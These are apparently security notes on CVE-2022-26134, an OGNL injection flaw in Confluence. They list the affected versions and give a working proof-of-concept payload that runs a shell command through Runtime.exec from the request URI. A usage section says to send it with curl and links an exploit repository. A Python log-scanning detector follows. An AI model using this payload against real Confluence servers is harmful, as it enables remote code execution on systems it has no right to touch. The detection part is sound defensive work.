# CVE-2022-26134

* [NIST CVE-2022-26134](https://nvd.nist.gov/vuln/detail/CVE-2022-26134)
* Affected Confluence versions:
    * 1.3.0 to 7.4.17
    * 7.13.0 to 7.13.7
    * 7.14.0 to 7.14.3
    * 7.15.0 to 7.15.2
    * 7.16.0 to 7.16.4
    * 7.17.0 to 7.17.4
    * 7.18.0 to 7.18.1
* Vulnerability class: Object Graph Navigation Language (OGNL) injection

## Usage

* The payload is an OGNL expression placed in the URI of a GET request:
```sh
${@java.lang.Runtime@getRuntime().exec("touch /tmp/exploit")}/
```
* URL-encode the payload and send it with curl for a PoC

* Use [Nwqda's exploit](https://github.com/Nwqda/CVE-2022-26134.git)
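
Because the expression travels URL-encoded in the request path, it is visible in web server or reverse proxy access logs. The following detection sketch is an added example, not part of the original notes or of any project linked here; it assumes combined-format access logs, and the sample log lines, IP addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Request line of a combined-format access log entry: "METHOD URI HTTP/x.y"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/[\d.]+"')
# OGNL expression delimiters as used in the payload above: ${ ... }
OGNL_RE = re.compile(r'\$\{.*?\}', re.DOTALL)
# OGNL static method reference, e.g. @java.lang.Runtime@getRuntime
STATIC_CALL_RE = re.compile(r'@[\w.$]+@\w+')

# Constructed sample log lines (documentation IP ranges, made-up timestamps).
SAMPLE_LOG = [
    '192.0.2.10 - - [03/Jun/2022:10:01:02 +0000] "GET /dashboard.action HTTP/1.1" 200 5123',
    '203.0.113.7 - - [03/Jun/2022:10:01:05 +0000] "GET /%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22touch%20/tmp/exploit%22%29%7D/ HTTP/1.1" 302 0',
    '198.51.100.4 - - [03/Jun/2022:10:01:09 +0000] "GET /%2524%257B1%252B1%257D/ HTTP/1.1" 302 0',
    '192.0.2.10 - - [03/Jun/2022:10:01:11 +0000] "GET /pages/viewpage.action?pageId=65601 HTTP/1.1" 200 9120',
]

def decode_uri(uri, max_rounds=3):
    """URL-decode repeatedly so double-encoded payloads are normalised."""
    for _ in range(max_rounds):
        decoded = unquote(uri)
        if decoded == uri:
            break
        uri = decoded
    return uri

def scan_line(line):
    """Return a finding dict for one access-log line, or None if it looks clean."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    # Only the path is inspected: the payload is carried in the URI path.
    path = decode_uri(m.group("uri").split("?", 1)[0])
    expr = OGNL_RE.search(path)
    if not expr:
        return None
    return {
        "client": line.split(" ", 1)[0],
        "method": m.group("method"),
        "expression": expr.group(0),
        "static_call": bool(STATIC_CALL_RE.search(expr.group(0))),
    }

def scan_log(lines):
    """Scan an iterable of log lines and return all findings in order."""
    return [f for f in map(scan_line, lines) if f]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

A finding with `static_call` set means the decoded path references a Java static method, as in the payload above; a finding without it is still an OGNL expression in the path and is worth triaging.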